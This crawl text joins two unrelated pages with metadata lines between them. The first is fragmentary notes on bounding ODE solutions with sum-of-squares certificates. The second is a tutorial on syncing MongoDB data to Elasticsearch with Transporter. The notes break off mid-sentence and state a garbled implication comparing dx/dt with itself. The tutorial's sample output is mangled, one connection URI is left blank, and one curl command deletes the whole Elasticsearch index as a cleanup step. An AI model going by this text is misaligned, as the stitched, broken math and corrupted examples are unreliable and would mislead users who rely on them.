approximation with point choice? linear ranking functions Connection to petri nets? KoAt, LoAT. AProve. Integer transition systems. Termination analysis. Loops? darboux polynomials. barreir certificates. prelle-singer method. first integrals. Lie Algebra method sympy links this paper. Sympy has some lie algebra stuff in there Peter Olver tutorial olver talks andre platzer. Zach says Darboux polynomials? Books: Birhoff and Rota, Guggenheimer, different Olver books, prwctical guide to invaraints Idea: Approximate invariants? At least this ought to make a good coordinate system to work in where the dynamics are slow. Like action-angle and adiabatic transformations. Could also perhaps bound the Picard Iteration I have a method that I’m not sure is ultimately sound. The idea is to start with Error analysis most often uses an appeal to Taylor’s theorem and Taylor’s theorem is usually derived from them mean value theorem or intermediate value theorem. Maybe that’s fine. But the mean value theorem is some heavy stuff. There are computational doo dads that use these bounds + interval analysis to rigorously integrate ODEs. See The beauty of sum of squares certificates is that they are very primitive proofs of positivity for a function on a domain of infinitely many values. If I give you a way to write an expression as a sum of square terms, it is then quite obvious that it has to be always positive. This is algebra rather than analysis. $ y(t) = \lambda(t) \and \lambda(t) is SOS \Rightarrow \forall t. y(t) >= 0$. Sum of squares is a kind of a quantifier elimination method. The reverse direction of the above implication is the subject of the positivstullensatz, a theorem of real algebraic geometry. At the very least, we can use the SOS constraint as a relaxation of the quantified constraint. So, I think by using sum of squares, we can turn a differential equation into a differential inequation. If we force the highest derivative to be larger than the required differential equation, we will get an overestimate of the required function. A function that is dominated by another in derivative, will be dominated in value also. You can integrate over inequalities (I think. You have to be careful about such things. ) $ \forall t. \frac{dx}{dt} >= \frac{dx}{dt} \Rightarrow $ x(t) - x(0) >= y(t) - y(0) $ The derivative of a polynomial can be thought of as a completely formal operation, with no necessarily implied calculus meaning. It seems we can play a funny kind of shell game to avoid the bulk of calculus. As an example, let’s take $ \frac{dx}{dt}=y$ $ y(0) = 1$ with the solution $ y = e^t$. $ e$ is a transcendental The S-procedure is trick by which you can relax a sum of squares inequality to only need to be enforced in a domain. If you build a polynomials function that describes the domain, it that it is positive inside the domain and negative outside the domain, you can add a positive multiple of that to your SOS inequalities. Inside the domain you care about, you’ve only made them harder to satisfy, not easier. But outside the domain you have made it easier because you can have negative slack. For the domain $ t \in [0,1]$ the polynomial $ (1 - t)t$ works as our domain polynomial. We parametrize our solution as an explicit polynomial $ x(t) = a_0 + a_1 t + a_2 t^2 + …$. It is important to note that what follows is always linear in the $ a_i$. $ \frac{dx}{dt} - x >= 0$ can be relaxed to $ \frac{dx}{dt} - x(t) + \lambda(t)(1-t)t >= 0$ with $ \lambda(t) is SOS$. So with that we get a reasonable formulation of finding a polynomial upper bound solution of the differential equation $ \min x(1) $ $ \frac{dx}{dt} - x(t) + \lambda_1(t)(1-t)t = \lambda_2(t)$ $ \lambda_{1,2}(t) is SOS$. And here it is written out in python using my cvxpy-helpers which bridge the gap between sympy polynomials and cvxpy. We can go backwards to figure out sufficient conditions for a bound. We want $ x_u(t_f) \gte x(t_f)$. It is sufficient that $ \forall t. x_u(t) \gte x(t)$. For this it is sufficient that $ \forall t. x_u’(t) >= x’(t) \and x_u(t_i) >= x(t_i) $. We follow this down in derivative until we get the lowest derivative in the differential equation. Then we can use the linear differential equation itself $ x^{(n)}(t) = \sum_i a_i(t) x^{(i)}(t)$. $ x_u^{(n)}(t) >= \sum max(a_i x^{(i)}_u, x^{(i)}_l)$. $ a(t) * x(t) >= \max a(t) x_u(t), a(t) x_l(t)$. This accounts for the possibility of terms changing signs. Or you could separate the terms into regions of constant sign. The minimization characterization of the bound is useful. For any class of functions that contains our degree-d polynomial, we can show that the minimum of the same optimization problem is less than or equal to our value. Is the dual value useful? The lower bound on the least upper bound Doesn’t seem like the method will work for nonlinear odes. Maybe it will if you relax the nonlinearity. Or you could use perhaps a MIDSP to make piecewise linear approximations of the nonlinearity? It is interesting to investigtae linear programming models. It is simpler and more concrete to examine how well different step sizes approximate each other rather than worry about the differential case. We can explicit compute a finite difference solution in the LP, which is a power that is difficult to achieve in general for differential equations. We can instead remove the exact solution by a convservative bound. While we can differentiate through an equality, we can’t differentiate through an inequality. Differentiation involves negation, which plays havoc with inequalities. We can however integrate through inequalities. $ \frac{dx}{dt} >= f \and x(0) >= a \Rightarrow $ x(t) >= \int^t_0 f(x) + a$ As a generalization we can integrate $ \int p(x) $ over inequalities as long as $ p(x) \gte 0$ In particular $ \forall t. \frac{dx}{dt} >= \frac{dx}{dt} \Rightarrow $ x(t) - x(0) >= y(t) - y(0) $ We can convert a differential equation into a differential inequation. It is not entirely clear to me that there is a canonical way to do this. But it works to take the biggest. $ \frac{dx}{dt} = A(t)x + f(t)$ Is there a tightest We can integrate Here let’s calculate e Thesis on ODE bounds in Isabelle <code class="language-">myfunc x y = 3</code> not so good. very small
http://www.philipzucker.com/fiddling-around-with-validated-ode-integration-sum-of-squares-taylor-models/
CC-MAIN-2021-10
refinedweb
3,307
58.18
Related How To Sync Transformed Data from MongoDB to Elasticsearch with Transporter on Ubuntu 16.04 Introduction Transporter is an open-source tool for moving data across different data stores. Developers often write one-off scripts for tasks like moving data across databases, moving data from files to a database, or vice versa, but using a tool like Transporter has several advantages. In Transporter, you build pipelines, which define the flow of data from a source (where the data is read) to a sink (where the data is written). Sources and sinks can be SQL or NoSQL databases, flat files, or other resources. Transporter uses adaptors, which are pluggable extensions, to communicate with these resources and the project includes several adaptors for popular databases by default. In addition to moving data, Transporter also allows you to change data as it moves through a pipeline using a transformer. Like adaptors, there are several transformers included by default. You can also write your own transformers to customize the modification of your data. In this tutorial, we’ll walk through an example of moving and processing data from a MongoDB database to Elasticsearch using Transporter’s built-in adaptors and a custom transformer written in JavaScript. Prerequisites To follow this tutorial, you will need: - One Ubuntu 16.04 server set up by following this Ubuntu 16.04 initial server setup tutorial, including a sudo non-root user and a firewall. - MongoDB installed by following this MongoDB on Ubuntu 16.04 tutorial, or an existing MongoDB installation. - Elasticsearch installed by following this Elasticsearch on Ubuntu 16.04 tutorial, or an existing Elasticsearch installation. Transporter pipelines are written in JavaScript. You won’t need any prior JavaScript knowledge or experience to follow along with this tutorial, but you can learn more in these JavaScript tutorials. Step 1 — Installing Transporter Transporter provides binaries for most common operating systems. The installation process for Ubuntu involves two steps: downloading the Linux binary and making it executable. First, get the link for the latest version from Transporter’s latest releases page on GitHub. Copy the link that ends with -linux-amd64. This tutorial uses v0.5.2, which is the most recent at time of writing. Download the binary into your home directory. - cd - wget Move it into /usr/local/bin or your preferred installation directory. - mv transporter-*-linux-amd64 /usr/local/bin/transporter Then make it executable so you can run it. - chmod +x /usr/local/bin/transporter You can test that Transporter is set up correctly by running the binary. - transporter You’ll see the usage help output and the version number: OutputUSAGE transporter <command> [flags] COMMANDS run run pipeline loaded from a file . . . VERSION 0.5.2 In order to use Transporter to move data from MongoDB to Elasticsearch, we need two things: data in MongoDB that we want to move and a pipeline that tells Transporter how to move it. The next step creates some example data, but if you already have a MongoDB database that you want to move, you can skip the next step and go straight to Step 3. Step 2 — Adding Example Data to MongoDB (Optional) In this step, we’ll create a example database with a single collection in MongoDB and add a few documents to that collection. Then, in the rest of the tutorial, we’ll migrate and transform this example data with a Transporter pipeline. First, connect to your MongoDB database. - mongo This will change your prompt to mongo>, indicating that you’re using the MongoDB shell. From here, select a database to work on. We’ll call ours my_application. - use my_application In MongoDB, you don’t need to explicitly create a database or a collection. Once you start adding data to a database you’ve selected by name, that database will automatically be created. So, to create the my_application database, save two documents to its users collection: one representing Sammy Shark and one representing Gilly Glowfish. This will be our test data. - db.users.save({"firstName": "Sammy", "lastName": "Shark"}); - db.users.save({"firstName": "Gilly", "lastName": "Glowfish"}); After you’ve added the documents, you can query the users collection to see your records. - db.users.find().pretty(); The output will look similar to the output below, but the _id columns will be different. MongoDB automatically adds object IDs to uniquely identify the documents in a collection. output{ "_id" : ObjectId("59299ac7f80b31254a916456"), "firstName" : "Sammy", "lastName" : "Shark" } { "_id" : ObjectId("59299ac7f80b31254a916457"), "firstName" : "Gilly", "lastName" : "Glowfish" } CTRL+C to exit the MongoDB shell. Next, let’s create a Transporter pipeline to move this data from MongoDB to Elasticsearch. Step 3 — Creating a Basic Pipeline A pipeline in Transporter is defined by a JavaScript file named pipeline.js by default. The built-in init command creates a basic configuration file in the correct directory, given a source and sink. Initialize a starter pipeline.js with MongoDB as the source and Elasticsearch as the sink. - transporter init mongodb elasticsearch You’ll see the following output: OutputWriting pipeline.js... You won’t need to modify pipeline.js for this step, but let’s take a look to see how it works. The file looks like this, but you can also view the contents of the file using the command cat pipeline.js, less pipeline.js (exit less by pressing q), or by opening it with your favorite text editor. var source = mongodb({ "uri": "${MONGODB_URI}" // "timeout": "30s", // "tail": false, // "ssl": false, // "cacerts": ["/path/to/cert.pem"], // "wc": 1, // "fsync": false, // "bulk": false, // "collection_filters": "{}", // "read_preference": "Primary" }) var sink = elasticsearch({ "uri": "${ELASTICSEARCH_URI}" // "timeout": "10s", // defaults to 30s // "aws_access_key": "ABCDEF", // used for signing requests to AWS Elasticsearch service // "aws_access_secret": "ABCDEF" // used for signing requests to AWS Elasticsearch service // "parent_id": "elastic_parent" // defaults to "elastic_parent" parent identifier for Elasticsearch }) t.Source("source", source, "/.*/").Save("sink", sink, "/.*/") The lines that begin with var source and var sink define JavaScript variables for the MongoDB and Elasticsearch adaptors, respectively. We’ll define the MONGODB_URI and ELASTICSEARCH_URI environment variables that these adaptors need later in this step. The lines that begin with // are comments. They highlight some common configuration options you can set for your pipeline, but we aren’t using them for the basic pipeline we’re creating here. The last line connects the source and the sink. The variable transporter or t lets us access our pipeline. We use the .Source() and .Save() functions to add the source and sink using the source and sink variables defined previously in the file. The third argument to the Source() and Save() functions is the namespace. Passing /.*/ as the last argument means that we want to transfer all the data from MongoDB and save it under the same namespace in Elasticsearch. Before we can run this pipeline, we need to set the environment variables for the MongoDB URI and Elasticsearch URI. In the example we’re using, both are hosted locally with default settings, but make sure you customize these options if you’re using existing MongoDB or Elasticsearch instances. - export MONGODB_URI='mongodb://localhost/my_application' - export ELASTICSEARCH_URI='' Now we’re ready to run the pipeline. - transporter run pipeline.js You’ll see output that ends like this: Output. . . INFO[0001] metrics source records: 2 path=source ts=1522942118483391242 INFO[0001] metrics source/sink records: 2 path="source/sink" ts=1522942118483395960 INFO[0001] exit map[source:mongodb sink:elasticsearch] ts=1522942118483396878 In the second- and third-to-last lines, this output indicates that there were 2 records present in the source and 2 records were moved over to the sink. To confirm that both the records were processed, you can query Elasticsearch for the contents of the my_application database, which should now exist. - curl $ELASTICSEARCH_URI/_search?pretty=true The ?pretty=true parameter makes the output easier to read: Output{ "took" : 5, ", "lastName" : "Glowfish" } }, { "_index" : "my_application", "_type" : "users", "_id" : "5ac63e986687d9f638ced4fd", "_score" : 1.0, "_source" : { "firstName" : "Sammy", "lastName" : "Shark" } } ] } } Databases and collections in MongoDB are analogous to indexes and types in Elasticsearch. With that in mind, you should see: - The _indexfield set to my_application,the name of the original MongoDB database). - The _typefield set to users,the name of the MongoDB collection. - The firstNameand lastNamefields filled out with “Sammy” “Shark” and “Gilly” “Glowfish”, respectively. This confirms that both the records from MongoDB were successfully processed through Transporter and loaded to Elasticsearch. To build upon this basic pipeline, we’ll add an intermediate processing step that can transform the input data. Step 4 — Creating a Transformer As the name suggests, transformers modify the source data before loading it to the sink. For example, they allow you to add a new field, remove a field, or change the data of a field. Transporter comes with some predefined transformers as well as support for custom ones. Typically, custom transformers are written as JavaScript functions and saved in a separate file. To use them, you add a reference to the transformer file in pipeline.js . Transporter includes both the Otto and Goja JavaScript engines. Because Goja is newer and generally faster, we’ll use it here. The only functional difference is the syntax. Create a file called transform.js, which we’ll use to write our transformation function. - nano transform.js Here’s the function we’ll use, which will create a new field called fullName, the value of which will be the firstName and lastName fields concatenated together, separated by a space (like Sammy Shark). function transform(msg) { msg.data.fullName = msg.data.firstName + " " + msg.data.lastName; return msg } Let’s walk through the lines of this file: - The first line of the file, function transform(msg),is the function definition. msgis a JavaScript object that contains the details of the source document. We use this object to access the data going through the pipeline. - The first line of the function concatenates the two existing fields and assigns that value to the new fullNamefield. - The final line of the function returns the newly modified msgobject for the rest of the pipeline to use. Save and close the file. Next, we need to modify the pipeline to use this transformer. Open the pipeline.js file for editing. - nano pipeline.js In the final line, we need to add a call to the Transform() function to add the transformer to the pipeline between the calls to Source() and Save(), like this: . . . t.Source("source", source, "/.*/") .Transform(goja({"filename": "transform.js"})) .Save("sink", sink, "/.*/") The argument passed to Transform() is the type of transformation, which is Goja in this case. Using the goja function, we specify the the filename of the transformer using its relative path. Save and close the file. Before we rerun the pipeline to test the transformer, let’s clear the existing data in Elasticsearch from the previous test. - curl -XDELETE $ELASTICSEARCH_URI You’ll see this output acknowledging the success of the command. Output{"acknowledged":true} Now rerun the pipeline. - transporter run pipeline.js The output will look very similar to the previous test, and you can see in the last few lines whether the pipeline completed successfully as before. To be sure, we can again check Elasticsearch to see if the data exists in the format we expect. - curl $ELASTICSEARCH_URI/_search?pretty=true You can see the fullName field in the new output: Output{ "took" : 9, ", "fullName" : "Gilly Glowfish", "lastName" : "Glowfish" } }, { "_index" : "my_application", "_type" : "users", "_id" : "5ac63e986687d9f638ced4fd", "_score" : 1.0, "_source" : { "firstName" : "Sammy", "fullName" : "Sammy Shark", "lastName" : "Shark" } } ] } } Notice the fullName field has been added in both documents with the values correctly set. With this, now we know how to add custom transformations to a Transporter pipeline. Conclusion You’ve built a basic Transporter pipeline with an transformer to copy and modify data from MongoDB to Elasticsearch. You can apply more complex transformations in the same way, chain multiple transformations in the same pipeline, and more. MongoDB and Elasticsearch are only two of the adapters Transporter supports. It also supports flat files, SQL databases like Postgres, and many other data sources. You can check out the Transporter project on GitHub to stay updated for the latest changes in the API, and visit the Transporter wiki for more detailed information on how to use adaptors, transformers, and Transformer’s other features. 3 Comments
https://www.digitalocean.com/community/tutorials/how-to-sync-transformed-data-from-mongodb-to-elasticsearch-with-transporter-on-ubuntu-16-04
CC-MAIN-2019-43
refinedweb
2,030
55.95